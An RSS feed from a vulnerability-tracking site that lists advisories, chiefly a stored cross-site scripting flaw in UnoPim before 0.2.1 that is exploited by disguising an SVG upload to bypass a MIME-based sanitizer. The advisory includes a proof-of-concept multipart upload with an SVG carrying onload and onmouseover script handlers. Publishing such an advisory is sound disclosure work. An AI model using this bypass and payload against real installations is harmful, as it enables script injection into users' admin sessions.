<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Wed, 07 Oct 2026 12:17:11 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-250398</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-250398</link>
      <description>EUVD-2026-250398</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-250398</guid>
    </item>
    <item>
      <title>fkie_cve-2025-55742</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2025-55742</link>
      <description>&lt;p&gt;UnoPim is an open-source Product Information Management (PIM) system built on the Laravel framework. Before 0.2.1, UnoPim contains a stored cross-site scripting vulnerability via SVG MIME/sanitizer bypass in the /admin/settings/users/create endpoint. This vulnerability is fixed in 0.2.1.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;UnoPim is an open-source Product Information Management (PIM) system built on the Laravel framework. Before 0.2.1, UnoPim contains a stored cross-site scripting vulnerability via SVG MIME/sanitizer bypass in the /admin/settings/users/create endpoint. This vulnerability is fixed in 0.2.1.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2025-55742</guid>
    </item>
    <item>
      <title>GHSA-xr97-25v7-hc2q — UnoPim has Stored Cross-site Scripting vulnerability in user creation functionality</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-xr97-25v7-hc2q</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Packagist: unopim/unopim&lt;/p&gt;
&lt;p&gt;### Summary
Affected Functionality: User creation
Endpoint: `/admin/settings/users/create`&lt;/p&gt;
&lt;p&gt;### Details
https://github.com/unopim/unopim/blob/a0dc81947a59ada69e19e1e4313dd591d4e277b4/packages/Webkul/Core/src/Traits/Sanitizer.php#L9-L19
See the mimetype is checked for validation.
Mime-type is usually identified by analysing the first few bytes of the file content, which contains the File signature or Magic bytes
for e.g. GIF file starts with GIF87a or GIF89a. We can mislead the sanitizer to think the uploaded file is gif ( based on magic byte provided ) while actually it is a .svg file.&lt;/p&gt;
&lt;p&gt;File containing &amp;lt;svg&amp;gt; is considered as svg and is sanitized:
![image](https://github.com/user-attachments/assets/bcb0ce04-6bbe-4058-81da-927331247d3d)
```
Content-Disposition: form-data; name=&amp;#34;image[]&amp;#34;; filename=&amp;#34;poc.html&amp;#34;
Content-Type: image/svg+xml&lt;/p&gt;
&lt;p&gt;&amp;lt;?xml version=&amp;#34;1.0&amp;#34; encoding=&amp;#34;UTF-8&amp;#34;?&amp;gt;
&amp;lt;svg xmlns=&amp;#34;http://www.w3.org/2000/svg&amp;#34; width=&amp;#34;200&amp;#34; height=&amp;#34;200&amp;#34; viewBox=&amp;#34;0 0 200 200&amp;#34;  onload=&amp;#34;alert(5)&amp;#34;&amp;gt;
  &amp;lt;rect width=&amp;#34;200&amp;#34; height=&amp;#34;200&amp;#34; fill=&amp;#34;#3498db&amp;#34; onmouseover=&amp;#34;alert(&amp;#39;Hover&amp;#39;)&amp;#34;&amp;gt;&amp;lt;/rect&amp;gt;
  &amp;lt;text x=&amp;#34;50%&amp;#34; y=&amp;#34;50%&amp;#34; font-size=&amp;#34;20&amp;#34; text-anchor=&amp;#34;middle&amp;#34; dy=&amp;#34;.3em&amp;#34; fill=&amp;#34;white&amp;#34; &amp;gt;Proof of Concept&amp;lt;/text&amp;gt;
&amp;lt;/svg&amp;gt;
```
![image](https://github.com/user-attachments/assets/47d33392-632e-442b-8e51-5ba5189385ca)&lt;/p&gt;
&lt;p&gt;Sanitization bypass using MIME type manipulation:
![image](https://github.com/user-attachments/assets/c4fa13a6-3c3a-4530-8d4e-68c203848a86)
```
Content-Disposition: form-data; name=&amp;#34;image[]&amp;#34;; filename=&amp;#34;poc.html&amp;#34;…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Packagist: unopim/unopim&lt;/p&gt;
&lt;p&gt;### Summary
Affected Functionality: User creation
Endpoint: `/admin/settings/users/create`&lt;/p&gt;
&lt;p&gt;### Details
https://github.com/unopim/unopim/blob/a0dc81947a59ada69e19e1e4313dd591d4e277b4/packages/Webkul/Core/src/Traits/Sanitizer.php#L9-L19
See the mimetype is checked for validation.
Mime-type is usually identified by analysing the first few bytes of the file content, which contains the File signature or Magic bytes
for e.g. GIF file starts with GIF87a or GIF89a. We can mislead the sanitizer to think the uploaded file is gif ( based on magic byte provided ) while actually it is a .svg file.&lt;/p&gt;
&lt;p&gt;File containing &amp;lt;svg&amp;gt; is considered as svg and is sanitized:
![image](https://github.com/user-attachments/assets/bcb0ce04-6bbe-4058-81da-927331247d3d)
```
Content-Disposition: form-data; name=&amp;#34;image[]&amp;#34;; filename=&amp;#34;poc.html&amp;#34;
Content-Type: image/svg+xml&lt;/p&gt;
&lt;p&gt;&amp;lt;?xml version=&amp;#34;1.0&amp;#34; encoding=&amp;#34;UTF-8&amp;#34;?&amp;gt;
&amp;lt;svg xmlns=&amp;#34;http://www.w3.org/2000/svg&amp;#34; width=&amp;#34;200&amp;#34; height=&amp;#34;200&amp;#34; viewBox=&amp;#34;0 0 200 200&amp;#34;  onload=&amp;#34;alert(5)&amp;#34;&amp;gt;
  &amp;lt;rect width=&amp;#34;200&amp;#34; height=&amp;#34;200&amp;#34; fill=&amp;#34;#3498db&amp;#34; onmouseover=&amp;#34;alert(&amp;#39;Hover&amp;#39;)&amp;#34;&amp;gt;&amp;lt;/rect&amp;gt;
  &amp;lt;text x=&amp;#34;50%&amp;#34; y=&amp;#34;50%&amp;#34; font-size=&amp;#34;20&amp;#34; text-anchor=&amp;#34;middle&amp;#34; dy=&amp;#34;.3em&amp;#34; fill=&amp;#34;white&amp;#34; &amp;gt;Proof of Concept&amp;lt;/text&amp;gt;
&amp;lt;/svg&amp;gt;
```
![image](https://github.com/user-attachments/assets/47d33392-632e-442b-8e51-5ba5189385ca)&lt;/p&gt;
&lt;p&gt;Sanitization bypass using MIME type manipulation:
![image](https://github.com/user-attachments/assets/c4fa13a6-3c3a-4530-8d4e-68c203848a86)
```
Content-Disposition: form-data; name=&amp;#34;image[]&amp;#34;; filename=&amp;#34;poc.html&amp;#34;…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-xr97-25v7-hc2q</guid>
    </item>
  </channel>
</rss>
